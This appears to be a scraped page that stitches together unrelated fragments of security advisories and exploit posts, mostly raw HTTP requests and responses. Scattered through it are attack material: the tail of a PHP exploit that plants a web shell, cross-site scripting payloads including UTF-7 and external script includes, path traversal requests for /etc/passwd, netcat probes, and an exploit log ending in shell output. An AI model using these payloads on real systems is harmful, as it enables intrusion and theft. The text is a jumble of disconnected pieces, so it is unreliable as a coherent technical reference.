Next Page >>
200 OK
same behavior would be exhibited by the victim proxy with host names:
// Lets check our target IP is handled by a NetCache:
$ printf "TRACE / HTTP/1.1\r\nHost: 74.125.65.106\r\nMax-Forwards:
0\r\nConnection: Close\r\n\r\n" | nc 74.125.65.106 80
HTTP/1.1 200 OK
Date: Mon, 17 Aug 2009 00:35:16 GMT
Content-Length: 97
Content-Type: message/http
Server: NetCache appliance (NetApp/6.0.7)
Connection: close
--B-O-U-N-D-A-R-Y731553141--
reply:
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
X-Powered-By: PHP/5.1.2
Set-Cookie: latest=img262; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us
Set-Cookie: PHPSESSID=[..]; path=/
-------
GET /phpmyadmin/setup/index.php HTTP/1.1
Response
--------
HTTP/1.1 200 OK
Date: Thu, 01 Dec 2011 16:42:17 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.2
Set-Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; path=/phpmyadmin/setup/; HttpOnly
Expires: Thu, 01 Dec 2011 16:42:17 GMT
> Host: www.example.com
> Accept: */*
> Content-Length: 71
> Content-Type: application/x-www-form-urlencoded
>
< HTTP/1.1 200 OK
< Date: Mon, 17 Dec 2007 19:29:34 GMT
< Server: Apache
< X-Powered-By: PHP/1.2.3-linuxz
< Content-Length: 355
< Content-Type: text/html
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";
sendpacket($packet,1,0,0);
if(stristr($html , '200 OK') != true)
{echo "<font color=white>Exploit Faild...</font>";} else echo
"<font color=white>Exploit
Succeeded...<br>http://$host:$port$path"."/images/stories/0day.php</font>";
}
?>
Content-type: text/html
Keep-Alive: 300
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 09 Aug 2007 01:01:48 GMT
Server: Apache/1.3.29 (Unix) PHP/5.1.6 with Suhosin-Patch mod_ssl/2.8.16 OpenSSL/0.9.7j
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
MSG 50 D 555
MIME-Version: 1.0
Content-Type: application/x-msnmsgrp2p
P2P-Dest: bbbb@hotmail.it
####^áEu######################ÔùH(############MSNSLP/1.0 200 OK
To: <msnmsgr:bbbbb@hotmail.it>
From: <msnmsgr:aaaa@hotmail.it>
Via: MSNSLP/1.0/TLP ;branch={31DB585D-3119-40AF-B02B-3D9BAEF32CD0}
CSeq: 1
Call-ID: {9A68685A-1FCF-86A1-B639-BA769BA9B514}
Note also that this packet does not contain any session id.
Response packet:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Disposition: attachment
Content-Type: application/json;charset=utf-8
Content-Length: 480
Date: Wed, 13 Jul 2011 18:57:19 GMT
Content-Length: 56
Starting, please wait..."><script>alert(1);</script>
RESPONSE:
HTTP/1.1 200 OK
Server: Cisco AWARE 2.0
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Connection: close
HEAD /../../var/log/messages HTTP/1.0
HTTP/1.1 200 OK
Content-Length: 178455
Content-Type: text/plain
Last-Modified: Thu, 25 Oct 2007 16:36:39 GMT
Server: Shttp/ServerKit
Date: Thu, 25 Oct 2007 16:42:32 GMT
username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=
Response:
HTTP/1.1 200 OK
Server: Virata-EmWeb/R6_2_0
Content-Type: text/html
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/
Set-Cookie: webvpnlogin=1
only the unfiltered value of the vulnerable parameter. It is possible
to create an URL which causes the resulting page to contain malicious
JavaScript code. A response to such a request could look like the
following example:
HTTP/1.1 200 OK
Date: Fri, 18 Jul 2008 13:13:30 GMT
Server: <server>
content-type: text/plain
Content-Length: 67
Keep-Alive: timeout=10, max=500
Date: Thu, 25 Sep 2008 11:35:20 GMT
Server: Apache/2.2.3
Location: http://server/opennms/event/list?
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 36
<html><body>BugSec</body></html><!--=
Content-Length: 0
Content-Length: 0
Location:
Transfer-Encoding: chunked
Content-Type: text/plain
HTTP/1.1 200 OK
Content-Type: text/plain
http://www.ush.it
--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
Accept: */*
PARTIAL HTTP RESPONSE (payload is returned after the 'postdata' tag):
HTTP/1.1 200 OK
Connection: close
Expires: 0
Date: Wed, 12 Dec 2007 17:32:08 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=
Response:
HTTP/1.1 200 OK
Server: Virata-EmWeb/R6_2_0
Content-Type: text/html
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/
Set-Cookie: webvpnlogin=1
src=http://xxx/a.js></script>'>a</a>
</html>
The link includes the cross site scripting injection
and brings the victim to page 2.html. The web server
returns 200 OK. The 2.html source code:
2.HTML
<html>
This is a proof of concept.
d2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method><
/query></iq>
RESPONSE:
==========
HTTP/1.1 200 OK
Server: IceWarp/9.4.2
Date: Wed, 20 Jul 2011 10:04:56 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control:no-store, no-cache, must-revalidate, post-check=0,
pre-check=0 Pragma: no-cache
Accept: */*
PARTIAL HTTP RESPONSE (payload is returned after the 'postdata' tag):
HTTP/1.1 200 OK
Connection: close
Expires: 0
Date: Wed, 12 Dec 2007 17:32:08 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
Escape character is '^]'.
GET /../../../../../../../../etc/passwd HTTP/1.0
Host: 192.168.1.10
Authorization: Basic c2VydmljZTpzZXJ2aWNl
HTTP/1.0 200 OK
Content-type: text/plain
Expires: Sat, 24 May 1980.7:00:00.GMT
Pragma: no-cache
Server: simple httpd 1.0
We have recrived a lot of question about news http://securityreason.com/news/0/0x1f . And we will show How to exploit this issue. When using PHP as an Apache module, you can also change the configuration settings using directives in .htaccess file. But it is possible to bypass a safe_mode or open_basedir per mail.force_extra_parameters. In a lot of servers is sendmail, can be also exim etc. But we show how to exploit this for a famous mail server (SENDMAIL).
For example you can set mail.force_extra_parameters via .htaccess.
cxib# curl -I http://localhost:82
HTTP/1.1 200 OK
Date: Thu, 06 Sep 2007 22:18:35 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.4
Last-Modified: Sat, 20 Nov 2004 20:16:24 GMT
ETag: "27e4f0-2c-4c23b600"
Accept-Ranges: bytes
#
# --12:19:27-- http://www.wekk.net/research/CVE-2007-5301/exploit.ogg
# => `exploit.ogg'
# Resolving www.wekk.net... 64.22.71.90
# Connecting to www.wekk.net|64.22.71.90|:80... connected.
# HTTP request sent, awaiting response... 200 OK
# Length: 5,421 (5.3K) [application/ogg]
#
# 100%[===============================================================================>] 5,421
# 12:19:28 (37.00 KB/s) - `exploit.ogg' saved [5421/5421]
# uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)
Fscript%3E&dprefix=&siteurl=A.B.C.D&Submit=next&lang=en-us&step=print
Config
#Response
HTTP/1.1 200 OK
Date: Sat, 10 Dec 2011 02:46:44 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.2
Content-Length: 674
Connection: close
Accept: */*
PARTIAL HTTP RESPONSE (payload is returned after the 'postdata' tag):
HTTP/1.1 200 OK
Connection: close
Expires: 0
Date: Wed, 12 Dec 2007 17:32:08 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
1. GET / HTTP/1.1
>>>>>>> <body onload='sendMsg("758474843719")
2. POST /index.php?checknum=758474843719&msg=baseapp HTTP/1.1
>>>>>>> HTTP/1.1 200 OK
Date: Mon, 27 Aug 2007 18:58:21 GMT
Server: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Accept: */*
PARTIAL HTTP RESPONSE (payload is returned after the 'postdata' tag):
HTTP/1.1 200 OK
Connection: close
Expires: 0
Date: Wed, 12 Dec 2007 17:32:08 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
Keep-Alive: 300
Connection: keep-alive
Cookie: sessionid=[...]; cadata="[...]"
And we get a redirection to the website defined:
HTTP/1.1 200 OK
Cache-Control: No-cache
Content-Length: 277
Content-Type: text/html
Expires: Fri, 28 Mar 2008 08:53:11 GMT
Server: Microsoft-IIS/6.0
Type: text/html; charset%3dutf-7%0d%0a%0d%0a<html><body>+ADw-script+AD4-
alert('owned')+ADw-/script+AD4-</body></html>
This will result in:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-7
Server: Microsoft-IIS/6.0
Set-Cookie: url=cooki1=value1;
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Proxy-Connection: Keep-Alive
When the request will be executed, a popup showing the string Pwnd can be seen.
Here the response:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.1.GA (build: SVNTag=JBoss_4_2_1_GA
date=200707131605)/Tomcat-5.5
content-disposition: inline;filename=Customer_Lifetime_Orders.html
Content-Type: text/html;charset=UTF-8
You can save it in a text file and use it with netcat
(http://netcat.sourceforge.net/) like:
>nc bld02 80 < db_dump.txt | more
HTTP/1.1 200 OK
Date: Tue, 20 Oct 2009 09:01:58 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.3 with Suhosin-Patch
mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-2ubuntu4.3
Pragma: private
Next Page>>
|
